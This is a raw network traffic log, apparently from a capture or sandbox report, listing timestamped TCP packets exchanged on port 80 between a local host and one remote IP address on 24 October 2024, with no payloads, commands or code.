Oct 24, 2024 13:54:24.179884911 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.179888964 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.179900885 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.179908037 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.179917097 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.179919004 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.179935932 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.179936886 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.179951906 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.179956913 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.179966927 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.179971933 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.179984093 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.179985046 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.180001020 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.180006027 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.180018902 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.180018902 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.180038929 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.180046082 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.180058956 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.180062056 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.180078983 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.180094004 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.180100918 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.180109978 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.180119991 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.180124044 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.180135012 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.180151939 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.180165052 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.180167913 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.180179119 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.180183887 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.180200100 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.180201054 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.180218935 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.180223942 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.180234909 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.180252075 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.180252075 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.180264950 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.180268049 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.180284977 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.180284977 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.180294037 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.180315018 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.180327892 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.180327892 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.180345058 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.180358887 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.180373907 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.180383921 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.180401087 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.180411100 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.180417061 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.180433989 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.180449963 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.180450916 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.180464983 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.180466890 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.180483103 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.180496931 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.180496931 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.180501938 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.180509090 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.180520058 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.180538893 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.180550098 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.180562019 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.180573940 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.180586100 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.180591106 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.180617094 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.180624008 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.180633068 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.180641890 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.180650949 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.180659056 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.180668116 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.180672884 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.180685043 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.180685997 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.180701017 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.180702925 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.180716991 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.180720091 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.180733919 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.180736065 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.180752039 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.180757046 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.180767059 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.180778980 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.180793047 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.180799961 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.180815935 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.180831909 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.180840015 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.180847883 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.180865049 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.180867910 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.180887938 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.180917978 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.305402040 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.305480003 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.305536032 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.305583000 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.305598021 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.305634022 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.305664062 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.305670977 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.305680990 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.305717945 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.305741072 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.305766106 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.305773973 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.305798054 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.305814028 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.305821896 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.305831909 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.305840015 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.305850029 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.305856943 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.305865049 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.305867910 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.305885077 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.305895090 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.305907011 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.305911064 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.305928946 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.305932045 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.305949926 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.305965900 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.305973053 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.305983067 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.305999994 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.306010008 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.306019068 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.306020975 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.306041002 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.306046963 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.306056023 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.306060076 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.306082964 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.306090117 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.306090117 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.306107998 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.306124926 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.306148052 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.306169987 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.306176901 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.306194067 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.306210041 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.306226969 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.306232929 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.306253910 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.306274891 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.306310892 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.306328058 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.306343079 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.306359053 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.306365967 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.306376934 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.306386948 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.306394100 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.306406021 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.306411028 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.306415081 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.306427956 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.306435108 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.306456089 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.306457043 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.306476116 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.306484938 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.306492090 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.306498051 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.306514978 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.306524992 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.306530952 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.306549072 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.306551933 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.306560040 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.306569099 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.306571960 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.306587934 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.306603909 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.306612968 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.306612968 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.306622982 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.306633949 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.306638956 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.306653976 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.306658030 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.306667089 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.306685925 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.306694031 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.306704998 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.306721926 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.306726933 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.306739092 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.306746006 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.306755066 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.306765079 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.306770086 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.306782007 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.306787968 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.306793928 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.306806087 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.306814909 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.306824923 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.306837082 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.306837082 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.306843042 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.306884050 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.345268011 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.351622105 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.577733040 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.577755928 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.577785015 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.577810049 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.577816963 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.577836037 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.577836037 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.577855110 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.577862978 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.577871084 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.577888966 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.577896118 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.577917099 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.577924967 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.577938080 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.577943087 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.577960968 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.577975035 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.577975988 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.577994108 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.578007936 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.578013897 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.578027964 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.578033924 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.578038931 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.578052044 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.578068972 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.578089952 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.578095913 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.578099012 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.578113079 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.578133106 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.578134060 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.578150988 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.578156948 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.578166962 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.578170061 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.578181982 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.578200102 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.578206062 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.578217983 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.578232050 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.578246117 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.578253984 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.578263044 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.578267097 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.578279972 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.578288078 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.578298092 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.578299046 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.578315973 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.578325987 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.578332901 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.578342915 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.578358889 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.578376055 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.578381062 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.578393936 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.578411102 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.578413010 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.578413010 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.578428984 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.578452110 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.578474998 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.579035997 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.579072952 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.579090118 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.579092979 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.579107046 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.579123974 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.579134941 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.579134941 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.579139948 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.579147100 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.579158068 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.579159975 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.579175949 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.579186916 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.579195023 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.579202890 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.579230070 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.579241037 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.579246998 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.579262018 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.579265118 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.579282045 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.579288006 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.579298973 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.579298019 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.579323053 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.579329967 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.579349995 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.579368114 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.579385042 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.579389095 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.579401016 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.579404116 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.579421043 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.579423904 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.579437971 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.579448938 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.579457998 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.579467058 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.579484940 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.579502106 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.579508066 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.579518080 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.579528093 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.579536915 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.579550982 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.579554081 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.579572916 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.579575062 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.579586983 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.579597950 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.579602957 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.579605103 CEST	49714	80	192.168.2.6	95.182.96.50
